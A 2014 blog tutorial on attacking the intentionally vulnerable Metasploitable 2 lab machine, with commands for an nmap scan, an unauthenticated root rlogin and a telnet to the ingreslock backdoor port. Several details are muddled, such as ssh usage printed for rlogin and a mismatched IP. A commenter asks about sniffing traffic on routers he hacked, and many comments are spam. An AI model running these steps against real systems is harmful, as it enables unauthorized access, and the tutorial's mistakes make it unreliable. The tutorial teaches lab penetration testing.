Thursday, May 1, 2014

Metasploitable 2 : Vulnerability assessment and Remote Login

If you've followed my previous tutorial on Introduction to Metasploitable 2, then you should be sitting here with Kali Linux and Metasploitable 2 up and running. So, I'm gonna skip the formalities and move right ahead.


Portscan

On a Kali Linux machine, open a terminal. Type ifconfig, and note the eth0 IP address. This will give you an idea of what the ip of your target machine could be. In my case, ifconfig returned my IPv4 address as 192.168.154.131. This means that Metasploitable must have an IP residing somewhere in the 192.168.154.xxx range. To scan all ports in that range, you can use Nmap scan. Here is what it should look like.
nmap -sS 192.168.154.0/24




The conclusion that can be drawn here is that the Metasploitable 2 machine has IP 192.168.154.132. Also, it has a huge lot of open ports. As you will discover later, each of these ports is a potential gateway into the machine. On the metasploitable machine, after logging in with msfadmin:msfadmin, you can execute an ifconfig to verify that the IP is indeed 192.168.154.132 (or whatever may be your case).

Vulnerabilities

Now the Metasploitable 2 operating system has been loaded with a large number of vulnerabilites. There are the following kinds of vulnerabilities in Metasploitable 2-
  1. Misconfigured Services - A lot of services have been misconfigured and provide direct entry into the operating system.
  2. Backdoors - A few programs and services have been backdoored. These backdoors can be used to gain access to the OS.
  3. Weak Passwords - These are vulnerable to bruteforce attacks.
  4. Vulnerable Web Services- A few web services pre-installed into Metasploitable have known vulnerabilities which can be exploited.
  5. Web Application Vulnerabilities - Some vulnerable web applications can be exploited to gain entry to the system.
There is a very resourceful article about many vulnerabilities on Rapid7 website.

Exploiting The Vulnerabilities

Remote access vulnerability - Rlogin

Remember the list of open ports which you came up across during the port scan? The 512,513 and 514 ports are there for remotely accessing Unix machines. They have been misconfigured in such a way that anyone can set up a remote connection without proper authentication. This vulnerability is easy to exploit. We will use rlogin to remotely login to Metasploitable 2. Type rlogin to see the details about the command structure.


root@kali:~# rlogin
usage: ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec]
           [-D [bind_address:]port] [-e escape_char] [-F configfile]
           [-I pkcs11] [-i identity_file]
           [-L [bind_address:]port:host:hostport]
           [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
           [-R [bind_address:]port:host:hostport] [-S ctl_path]
           [-W host:port] [-w local_tun[:remote_tun]]
           [user@]hostname [command] 
 
rlogin -l root 192.168.154.132
Most probably you will get something like this-

root@kali:~# rlogin -l root 192.168.154.132
The authenticity of host '192.168.154.132 (192.168.154.132)' can't be established.
RSA key fingerprint is *****.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.154.132' (RSA) to the list of known hosts.
root@192.168.154.132's password: 

As you can see, it is asking for a password. It's not because the target is not vulnerable. It's because we don't have ssh-client installed on Kali Linux. The rsh-client is a remote login utility that it will allow users to connect to remote machines.
apt-get install rsh-client
This will start the installation progress, you'll have to type yes once or twice, Kali will do the rest for you. After the installation is successful, you should try your previous command again. This time around, things will be better.



root@kali:~# rlogin -l root 192.168.154.132
Last login: Thu May  1 11:34:55 EDT 2014 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~# 

Now you have an administrator privilege shell on Metasploitable 2. That was as easy as typing one line. (and installing an application). We have one more such vulnerability that can be exploited easily.

Telnet Vulnerability

Look at the open port list again. On port 21, Metasploitable 2 runs VSFTPD, a popular FTP server. The version that is installed on Metasploit contains a backdoor. The backdoor was quickly identified and removed, but not before quite a few people downloaded it. If a username is sent that ends in the sequence ":)" (the happy smiley), the backdoored version will open a listening shell on port 6200. This means anyone can login to a computer without knowing the credentials, just use :). This can be exploited using Metasploit. We will cover this in the next tutorial. Till then something for your appetite-
telnet 192.168.99.131 1524
This is a another one line exploit, on the 1524 ingreslock port (see portscan result). I will post more stuff soon, but this is all for now.

34 comments:

  1. Hi, found something to add.
    Users need to set their VM internet connection as "VM" to scan ports. Otherwise the ifconfig will not provide correct IP.

    ReplyDelete
    Replies
    1. Please elaborate. I didn't get you. Are you talking about the port-scan step?

      Delete
  2. Hi , i have hacked some routers (TP_Link and D_Link)...so i have full-complete access
    to the victim's router web interface....( my OS=Kali ) ....is there any way to sniff PC data traffic behind NAT???((except DNS Spoofing))......

    ReplyDelete
    Replies
    1. Web Interface is nice but yields little. You need to gain root access if you want to get anywhere,

      Delete
  3. where can i find the rest of your tutorials on this?

    ReplyDelete
  4. hii
    first amazing site love it
    and second i cant find any ports .
    my lp run kali and my pc run VM Metasploitable2
    i use nmap and get this >>>>
    note : host seems down , if it is really up , but blocking our ping probes , try -Pn ( i try it not working too)
    nmap done : 1 IP Address ( 0 host up ) .
    what i need to do ?
    thanks .

    ReplyDelete
    Replies
    1. you must ensure your metasploitable is up and running when scanning

      Delete
  5. Your metasploitable2 must be up and running when you are testing

    ReplyDelete
  6. scanning with nmap shows all ports are filtered. what should i do?

    ReplyDelete
    Replies
    1. turn off the firewall, or slow down the scan so firewall doesn't detect it. Also experiment with scan types

      Delete
  7. Hi,

    I followed up to the step where you download the RSH client. I am using a Kali VM and Metasploitable VM at the same time. For some reason when I try to remote login to Metasploitable now I get rlogind: Permission denied. Can you possibly help me out with this? I have been stuck for two days!

    ReplyDelete
  8. hi
    i am using windows 10 and i have installed metasploitable in virtual box. so how will i use metasploit in metasploitable

    ReplyDelete
    Replies
    1. Follow this guide for setup your Pentest lab: https://www.hackingloops.com/kali-linux-virtualbox-pentest-lab/

      Delete
  9. I think this is an informative post and it is very useful and knowledgeable. therefore, I would like to thank you for the efforts you have made in writing this article. GRC

    ReplyDelete
  10. A residence permit for spouses and minor children can be obtained together with the main investor. The procedure for obtaining a temporary residence permit takes 1 to 3 months. https://www.baltic-legal.com/legal-services-eng.htm

    ReplyDelete
  11. You know your projects stand out of the herd. There is something special about them. It seems to me all of them are really brilliant! virtual assessment centre

    ReplyDelete
  12. Traffic Lawyer Greensville VAThe way you describing is awesome.Keep on sharing more.

    ReplyDelete
  13. Metasploitable 2, an intentionally vulnerable virtual machine designed for training and educational purposes, serves as a crucial tool for cybersecurity professionals and enthusiasts aiming to practice vulnerability assessment and penetration testing skills. This platform exposes users to a wide range of vulnerabilities that mirror real-world weaknesses found in poorly secured systems, offering a hands-on experience in identifying and exploiting these flaws. Through the use of tools and techniques for vulnerability assessment, individuals can uncover weaknesses in services such as FTP, SSH, and web applications running on Metasploitable 2. Furthermore, it facilitates the practice of remote login exploitation, allowing users to hone their skills in gaining unauthorized access to systems via network services. Engaging with Metasploitable 2 not only enhances technical proficiency in a safe and controlled environment but also deepens the understanding of the importance of robust cybersecurity measures and the potential consequences of neglecting system security.
    motorcycle accident injury attorney

    ReplyDelete

  14. Kali Tutorials refers to instructional materials, guides, or resources designed to educate users on how to use Kali Linux, a popular distribution of Linux specifically tailored for penetration testing and cybersecurity tasks. These tutorials typically cover various aspects of Kali Linux, including installation, configuration, basic commands, and advanced techniques for conducting security assessments and ethical hacking. Kali Tutorials aim to provide users with practical knowledge and skills to effectively utilize Kali Linux for testing and securing computer systems and networks.
    Fairfax Divorce Lawyer
    Divorce Lawyers Fairfax VA




    ReplyDelete
  15. A Reckless Driving Attorney In New Jersey can help defend you against charges, protect your rights, and minimize penalties associated with reckless driving violations in the state.

    ReplyDelete
  16. Your blog continues to inspire and enlighten me. Your adept handling of complex topics with finesse and clarity is truly remarkable. The recent post was exceptionally well-articulated, offering valuable insights that broadened my horizons. Your talent for engaging readers and making learning enjoyable is a rare quality. Thank you for your unwavering commitment and dedication – it doesn't go unnoticed!

    ReplyDelete
  17. This article offers a unique take on a subject often left unexplored. The author's insights shed new light on familiar concepts, skillfully weaving together diverse ideas into a cohesive narrative. It's clear that considerable thought and expertise were poured into crafting this compelling piece. I'm excited to explore more of the content produced by this insightful writer

    ReplyDelete
    Replies
    1. This article provides a refreshing perspective on a commonly discussed topic. The author's insightful approach and skillful synthesis of ideas create a compelling read. I look forward to delving deeper into more of their thought-provoking content.

      Delete
  18. Stumbling upon this post feels like uncovering a hidden gem within daily interactions. The author skillfully captures the spirit of our time, expressing universal human experiences with profound clarity and empathy. Each sentence resonates deeply, encouraging introspection and mutual understanding. We truly value this insightful and thought-provoking contribution.

    ReplyDelete
  19. Your blog post was fantastic! The way you communicate complex ideas with such clarity and enthusiasm is impressive. I always learn something new from your posts, and this one was no exception. Thank you for sharing your insights and for making your blog such an enjoyable and informative read.

    ReplyDelete
  20. Happy Birthday Wishes
    ! May your wonderful day be filled with pleasure, laughter, and everything you enjoy. I wish you another year of health, happiness, and prosperity. Enjoy every moment and create lasting memories. Here's to celebrating you and all that makes you special. Cheers!

    ReplyDelete
  21. This article is too good not to share! My friends and colleagues need to see the fantastic information it contains.

    Visit our link for ISO Certification in Riyadh

    ReplyDelete
  22. The Geometry Dash game uses simple controls—just tap the screen or click the mouse to make your character jump. Timing is everything, as you need to avoid spikes, gaps, and other hazards.

    ReplyDelete
  23. The primary advantage of using an SSO ID is convenience. Instead of juggling multiple usernames and passwords for different platforms, you only need to remember one. This not only makes logging in faster and easier but also reduces the risk of security breaches. With fewer passwords to remember, you're less likely to write them down or use weak passwords, both of which can compromise security.

    SSO IDs also simplify the management of user access for organizations. IT administrators can easily control and monitor access to various services, ensuring that employees or students have the appropriate level of access based on their role or status.

    ReplyDelete
  24. This detailed analysis of Metasploitable 2 vulnerabilities is incredibly insightful! It’s a fantastic resource for anyone looking to enhance their cybersecurity skills. Visit our Website ISO Certification In Philippines


    ReplyDelete

© Kali Tutorials, 2016. Unauthorized use and/or duplication of this material without express and written permission from this site’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Shashwat Chaudhary and Kali Tutorials with appropriate and specific direction to the original content.